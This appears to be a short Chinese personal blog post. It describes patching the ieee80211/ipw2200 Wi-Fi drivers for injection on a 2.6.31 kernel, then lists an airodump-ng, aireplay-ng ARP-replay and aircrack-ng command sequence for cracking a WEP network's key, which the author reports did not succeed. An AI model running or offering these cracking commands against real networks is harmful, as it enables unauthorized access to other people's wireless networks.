下载
在网上下载了ieee80211-1.2.18、ipw2200-1.2.1以及他们的inject patch。
编译
sudo make;
sudo make install编译时出现了问题,说struct net_device没有叫做hard_start_xmit的成员。调查了一下,原来这个东西在我用的2.6.31内核上已经换了地方了。
struct net_device
{
……
const struct net_device_ops *netdev_ops;
//现在那个hard_start_xmit在这个成员里
……
};struct net_device_ops
{
……
netdev_tx_t (*ndo_start_xmit) (struct sk_buff *skb, struct net_device *dev);
//而且还改了名字
……
};ieee80211和ipw2200的source里边有很多类似的地方,原来struct net_device里面的东西,现在又封装了一层。
改好了以后还是不过,这回说有个的东西叫proc_net没有定义。网上搜了一下据说要改成init_net.proc_net。一样还是有多处。
再编译还是不过,这回是SET_MODULE_OWNER没有定义。网上说直接干掉。
OK了这回。
破解
据说关键在于要让网卡在key off状态下保持与AP的关联。
sudo modprob –r ipw2200
sudo modprob ipw2200 rtap_iface=1 channel=[CHANNEL]
sudo iwconfig [ethX] essid [ESSID] key [s:ANY-KEY] mode managed
sleep 3
sudo iwconfig [ethX] key off
sudo airodum-ng --ivs -c [CHANNEL] -i [rtapX] -w [CAP_FILE]
sudo aireplay-ng -3 -b [BSSID] -h [MAC] -i [rtapX] [ethX]
sudo aircrack-ng [CAP_FILE]*好像依然不能注入攻击。一个AP抓不到IVS,另一个20小时才两万。
没有评论:
发表评论